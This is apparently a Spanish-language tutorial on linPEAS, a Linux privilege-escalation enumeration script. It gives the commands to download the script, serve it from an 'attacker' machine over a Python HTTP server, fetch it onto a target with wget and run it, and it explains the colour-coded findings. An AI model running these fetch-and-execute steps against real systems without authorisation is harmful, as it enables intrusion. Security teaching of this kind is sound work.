Guía Completa: Uso de linPEAS para la Escalada de Privilegios en Linux

Introducción

En el ámbito de la ciberseguridad, la escalada de privilegios en sistemas Linux es una técnica crucial para evaluar la seguridad de un entorno. Una herramienta destacada para este propósito es linPEAS (Linux Privilege Escalation Awesome Script), un script diseñado para identificar posibles rutas de escalada de privilegios en hosts Linux/Unix/MacOS.

¿Qué es linPEAS?

linPEAS es un script que busca posibles caminos para escalar privilegios en sistemas Linux. Realiza una serie de comprobaciones para identificar configuraciones incorrectas, vulnerabilidades y otros aspectos que podrían ser explotados para obtener mayores privilegios en el sistema.

Descarga de linPEAS

Para obtener la versión más reciente de linPEAS, puedes descargarlo directamente desde el repositorio oficial en GitHub usando wget con el siguiente comando:

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -O linpeas.sh

Transferencia a la Máquina Objetivo

Una vez descargado, necesitas transferir el script a la máquina objetivo donde deseas realizar la evaluación. Aquí utilizaremos un servidor HTTP local levantado con Python para hacerlo a través del puerto 8000.

Levantando el Servidor HTTP Local

En tu máquina atacante (local), usa el siguiente comando para iniciar un servidor HTTP en el directorio donde descargaste linpeas.sh:

python3 -m http.server 8000

Descargando el Script en la Máquina Objetivo

En la máquina objetivo, utiliza wget para descargar el script desde tu máquina atacante:

wget http://<IP_de_tu_máquina_local>:8000/linpeas.sh -O linpeas.sh

Asignación de Permisos

Después de transferir el script, debes otorgarle permisos de ejecución en la máquina objetivo:

chmod +x linpeas.sh

Ejecución de linPEAS

Con los permisos adecuados, puedes ejecutar el script con el siguiente comando:

./linpeas.sh

El script comenzará a realizar diversas comprobaciones en el sistema y mostrará los resultados en la terminal.

Análisis de Resultados

linPEAS utiliza un sistema de colores para resaltar posibles vulnerabilidades:

  • Rojo: Indica hallazgos críticos que podrían permitir una escalada de privilegios inmediata.
  • Amarillo: Señala configuraciones o hallazgos que requieren una revisión adicional.
  • Azul: Información general que puede ser útil en el análisis.

Es fundamental revisar cuidadosamente los resultados para identificar posibles debilidades en el sistema.

Aquí debajo te dejo un ejemplo en video: